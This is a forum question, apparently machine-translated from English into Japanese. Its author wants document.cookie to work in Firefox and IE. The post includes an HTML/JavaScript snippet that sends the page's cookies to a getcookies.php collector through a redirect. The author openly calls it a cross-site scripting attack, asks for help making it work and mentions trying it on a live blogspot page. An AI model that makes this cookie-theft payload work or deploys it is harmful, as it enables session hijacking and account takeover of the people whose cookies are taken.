JavaScriptを使用してCookieを読み取る必要があります。私はdocument.cookie同じことをするためにを使用しています。ただし、この方法はGoogle Chromeでのみ機能し、FirefoxおよびIE8/9では機能しません。すべてのWebページもdocument.cookieそれを行う方法として表示されます。
JavaScriptを使用してFirefoxおよびIEでCookieを取得するにはどうすればよいですか?
ありがとう
更新 ローカルホストでコードをテストしました。blogspot.comでオンラインでコードをテストしたところ、Chromeでは機能しませんでした。
とにかく、HTMLコードは次のとおりです。
<script type="text/javascript">
function sendCookies(){
document.location='http://localhost/xss/getcookies.php?cookie='+escape(document.cookie);
}
</script>
<a onclick="sendCookies()" href="#">
click here </a> to know about XSS attack.
ブラウザでデバッグdocument.cookieしている間は、Chromeでのみ値が表示されます。ローカルホストリンクをオンラインリンクに置き換えるとdocument.cookie、Chromeでも空になります。
あなたの可能な推測は正しいです。これは一種のクロスサイトスクリプティング攻撃です。
このコードに関するヘルプは私にとって役に立ちますか?
更新2:
XSS攻撃を実行する方法を示すビデオへのリンクは次のとおりです。